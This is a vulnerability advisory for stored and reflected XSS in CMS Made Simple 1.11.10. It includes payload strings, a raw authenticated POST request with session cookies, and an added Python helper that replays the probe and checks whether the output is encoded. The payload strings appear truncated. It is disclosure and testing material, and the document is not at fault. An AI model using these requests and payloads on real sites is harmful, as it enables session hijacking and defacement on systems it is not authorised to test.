Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerabilities
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.cmsmadesimple.org/
Software Link : N/A
Version : 1.11.10
Tested on : Windows 7 hosted in WAMP server
Type of Application : open source content management system

Stored XSS :

Login to the admin portal and access the search functionality at
http://localhost/cmsmadesimple-1.11.10-full/index.php

Here the "search" parameter is vulnerable to stored XSS.

Payload : '">> '">>

CMS Made Simple Site

Reflected XSS :

Login to the admin portal, click "My Preferences" and then the "My Account" section.

Here the "email address" parameter is vulnerable to reflected XSS. The server rejects the value as an invalid e-mail address, but the error message echoes the submitted value back into the page without output encoding.

Payload : "";<"

request :

POST http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
Cookie: _sx_=1c8c76366630b299; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";<"&submit_account=Submit

response :

The email address entered is invalid: "";<"

My Account
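The following Python script is an added reproduction and verification helper for both findings above; it is not part of the original advisory and not CMS Made Simple project code. It rebuilds the advisory's POST body with the e-mail probe, classifies how a response page echoes the probe (verbatim, entity-encoded, or not at all), and shows the entity-encoded error message the server should have produced instead. The same reflection_status check applies to the stored search issue by fetching the page that displays the stored search term. The target URL, the session cookie argument and the send_probe function are assumptions for a lab instance; the response fragment used in the offline check is constructed from the response quoted in the advisory.

```python
import html
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# The advisory's probe string for the "email address" field.
EMAIL_PAYLOAD = '"";<"'
# Assumed lab target (hypothetical; taken from the advisory's request line).
MYACCOUNT_URL = ("http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/"
                 "myaccount.php?_sx_=1c8c76366630b299")


def build_myaccount_body(email: str, user: str = "test") -> str:
    """Rebuild the POST body from the advisory's request with a chosen probe
    in the email field. urlencode percent-encodes the quotes, ';' and '<',
    so the server decodes them back to the exact probe string."""
    fields = [
        ("active_tab", "maintab"),
        ("user", user),
        ("password", ""),
        ("passwordagain", ""),
        ("firstname", ""),
        ("lastname", ""),
        ("email", email),
        ("submit_account", "Submit"),
    ]
    return urlencode(fields)


def reflection_status(page: str, payload: str) -> str:
    """Classify how a response page echoed the probe:
      'raw'     - appears verbatim: no output encoding (the XSS reported above)
      'escaped' - only the HTML-entity form appears: safe in element content
      'absent'  - not reflected at all"""
    if payload in page:
        return "raw"
    if html.escape(payload, quote=True) in page:
        return "escaped"
    return "absent"


def render_error_safely(email: str) -> str:
    """How the rejected address should be echoed: the same message the
    advisory's response shows, with the user-controlled part entity-encoded
    (Python equivalent of PHP's htmlspecialchars($email, ENT_QUOTES))."""
    return "The email address entered is invalid: " + html.escape(email, quote=True)


def send_probe(url: str, cookie: str, payload: str = EMAIL_PAYLOAD) -> str:
    """Replay the advisory's request against a lab instance and classify the
    reflection. Needs a live target and a valid admin session cookie
    (hypothetical helper; not used by the offline checks below)."""
    body = build_myaccount_body(payload).encode()
    req = Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", cookie)
    with urlopen(req) as resp:
        return reflection_status(resp.read().decode(errors="replace"), payload)


if __name__ == "__main__":
    # Constructed fragment of the vulnerable response quoted in the advisory.
    vulnerable_page = 'The email address entered is invalid: "";<"\n\nMy Account'
    print(build_myaccount_body(EMAIL_PAYLOAD))
    print("vulnerable:", reflection_status(vulnerable_page, EMAIL_PAYLOAD))  # raw
    print("fixed     :", reflection_status(render_error_safely(EMAIL_PAYLOAD),
                                           EMAIL_PAYLOAD))                  # escaped
```

A 'raw' result is strong evidence of missing output encoding but not proof of execution in every context (attribute vs. element content differ), so confirm the final payload in a browser against the lab instance. As written in the advisory, both issues are reached with an authenticated admin session, which should be stated when rating their impact.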